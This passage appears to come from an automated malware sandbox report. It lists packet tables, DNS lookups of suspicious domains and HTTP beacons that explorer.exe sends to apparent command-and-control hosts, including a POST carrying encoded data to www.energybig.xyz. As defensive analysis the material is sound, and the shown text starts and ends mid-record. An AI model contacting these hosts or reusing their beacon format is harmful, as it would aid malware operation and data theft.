                                                  Feb 14, 2023 08:23:35.543663979 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.543752909 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.543792009 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.543822050 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.543843985 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.543863058 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.544017076 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.544091940 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.544372082 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.721141100 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:40.661408901 CET4971180192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:40.763863087 CET804971166.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:40.763993025 CET4971180192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:40.764137030 CET4971180192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:40.862593889 CET804971166.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:40.875576019 CET804971166.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:40.875606060 CET804971166.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:40.875688076 CET4971180192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:42.273416042 CET4971180192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.287571907 CET4971280192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.392596960 CET804971266.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:43.392757893 CET4971280192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.392874956 CET4971280192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.497891903 CET804971266.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:43.515486002 CET804971266.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:43.515523911 CET804971266.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:43.515655994 CET4971280192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.516043901 CET4971280192.168.2.566.96.162.149
                                                  Feb 14, 2023 08:23:43.620852947 CET804971266.96.162.149192.168.2.5
                                                  Feb 14, 2023 08:23:48.565310001 CET4971380192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:48.758558989 CET804971366.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:48.758775949 CET4971380192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:48.758982897 CET4971380192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:48.949512959 CET804971366.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:49.393743038 CET804971366.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:49.393774986 CET804971366.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:49.393944025 CET4971380192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:50.272155046 CET4971380192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:51.288707018 CET4971480192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:51.479078054 CET804971466.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:51.479198933 CET4971480192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:51.479305029 CET4971480192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:51.670198917 CET804971466.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:52.106976032 CET804971466.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:52.107028008 CET804971466.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:52.107285023 CET4971480192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:52.112102032 CET4971480192.168.2.566.160.197.76
                                                  Feb 14, 2023 08:23:52.302481890 CET804971466.160.197.76192.168.2.5
                                                  Feb 14, 2023 08:23:58.235198021 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:23:58.252866983 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.253132105 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:23:58.253298044 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:23:58.270818949 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749563932 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749651909 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749716997 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749778986 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749841928 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749902010 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.749968052 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.750021935 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.750068903 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.750113010 CET804971666.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:23:58.750422955 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:23:58.750422955 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:23:59.767232895 CET4971680192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:00.787545919 CET4971780192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:00.805253983 CET804971766.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:24:00.812496901 CET4971780192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:00.812688112 CET4971780192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:00.830274105 CET804971766.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:24:01.262164116 CET804971766.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:24:01.262188911 CET804971766.235.200.146192.168.2.5
                                                  Feb 14, 2023 08:24:01.265058994 CET4971780192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:01.265227079 CET4971780192.168.2.566.235.200.146
                                                  Feb 14, 2023 08:24:01.282666922 CET804971766.235.200.146192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 14, 2023 08:22:30.544280052 CET6189353192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:22:30.566801071 CET53618938.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:22:41.034720898 CET6064953192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:22:41.092329025 CET53606498.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:03.148277044 CET6532353192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:03.208219051 CET53653238.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:26.393337965 CET6344653192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:26.491744041 CET53634468.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:32.291379929 CET5503953192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:32.312706947 CET53550398.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:40.555316925 CET6097553192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:40.659852982 CET53609758.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:48.543411970 CET5922053192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:48.563358068 CET53592208.8.8.8192.168.2.5
                                                  Feb 14, 2023 08:23:57.923239946 CET5668253192.168.2.58.8.8.8
                                                  Feb 14, 2023 08:23:58.074588060 CET53566828.8.8.8192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Feb 14, 2023 08:22:30.544280052 CET192.168.2.58.8.8.80xd32cStandard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:22:41.034720898 CET192.168.2.58.8.8.80x5f42Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:03.148277044 CET192.168.2.58.8.8.80x91a4Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:26.393337965 CET192.168.2.58.8.8.80x59d9Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:32.291379929 CET192.168.2.58.8.8.80xaaa1Standard query (0)www.energybig.xyzA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:40.555316925 CET192.168.2.58.8.8.80x4f96Standard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:48.543411970 CET192.168.2.58.8.8.80xf51cStandard query (0)www.octohoki.netA (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:57.923239946 CET192.168.2.58.8.8.80xedbStandard query (0)www.ladybillplanet.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Feb 14, 2023 08:22:30.566801071 CET8.8.8.8192.168.2.50xd32cNo error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:22:41.092329025 CET8.8.8.8192.168.2.50x5f42No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                  Feb 14, 2023 08:22:41.092329025 CET8.8.8.8192.168.2.50x5f42No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:03.208219051 CET8.8.8.8192.168.2.50x91a4No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                  Feb 14, 2023 08:23:03.208219051 CET8.8.8.8192.168.2.50x91a4No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:26.491744041 CET8.8.8.8192.168.2.50x59d9No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                  Feb 14, 2023 08:23:26.491744041 CET8.8.8.8192.168.2.50x59d9No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:32.312706947 CET8.8.8.8192.168.2.50xaaa1No error (0)www.energybig.xyz184.94.215.91A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:40.659852982 CET8.8.8.8192.168.2.50x4f96No error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:48.563358068 CET8.8.8.8192.168.2.50xf51cNo error (0)www.octohoki.netoctohoki.netCNAME (Canonical name)IN (0x0001)false
                                                  Feb 14, 2023 08:23:48.563358068 CET8.8.8.8192.168.2.50xf51cNo error (0)octohoki.net66.160.197.76A (IP address)IN (0x0001)false
                                                  Feb 14, 2023 08:23:58.074588060 CET8.8.8.8192.168.2.50xedbNo error (0)www.ladybillplanet.comladybillplanet.comCNAME (Canonical name)IN (0x0001)false
                                                  Feb 14, 2023 08:23:58.074588060 CET8.8.8.8192.168.2.50xedbNo error (0)ladybillplanet.com66.235.200.146A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.wenzid4.top
                                                  • www.energybig.xyz
                                                  • www.genuineinsights.cloud
                                                  • www.octohoki.net
                                                  • www.ladybillplanet.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.549700107.148.8.9680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:22:30.794945955 CET0OUTGET /ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA== HTTP/1.1
                                                  Host: www.wenzid4.top
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Feb 14, 2023 08:22:31.001935005 CET0INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 14 Feb 2023 07:20:50 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 146
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.549709184.94.215.9180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:32.497952938 CET51OUTPOST /ghii/ HTTP/1.1
                                                  Host: www.energybig.xyz
                                                  Connection: close
                                                  Content-Length: 185
                                                  Cache-Control: no-cache
                                                  Origin: http://www.energybig.xyz
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.energybig.xyz/ghii/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 75 79 72 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: uyr=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
                                                  Feb 14, 2023 08:23:32.762336969 CET52INHTTP/1.1 404 Not Found
                                                  Date: Tue, 14 Feb 2023 07:23:32 GMT
                                                  Server: Apache
                                                  Content-Length: 5278
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                  Feb 14, 2023 08:23:32.762403011 CET53INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                  Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                  Feb 14, 2023 08:23:32.762459993 CET55INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                  Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                  Feb 14, 2023 08:23:32.762543917 CET56INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                  Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                  Feb 14, 2023 08:23:32.762584925 CET56INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                  Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.549710184.94.215.9180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:35.209734917 CET57OUTGET /ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw== HTTP/1.1
                                                  Host: www.energybig.xyz
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Feb 14, 2023 08:23:35.543663979 CET59INHTTP/1.1 404 Not Found
                                                  Date: Tue, 14 Feb 2023 07:23:35 GMT
                                                  Server: Apache
                                                  Content-Length: 5278
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 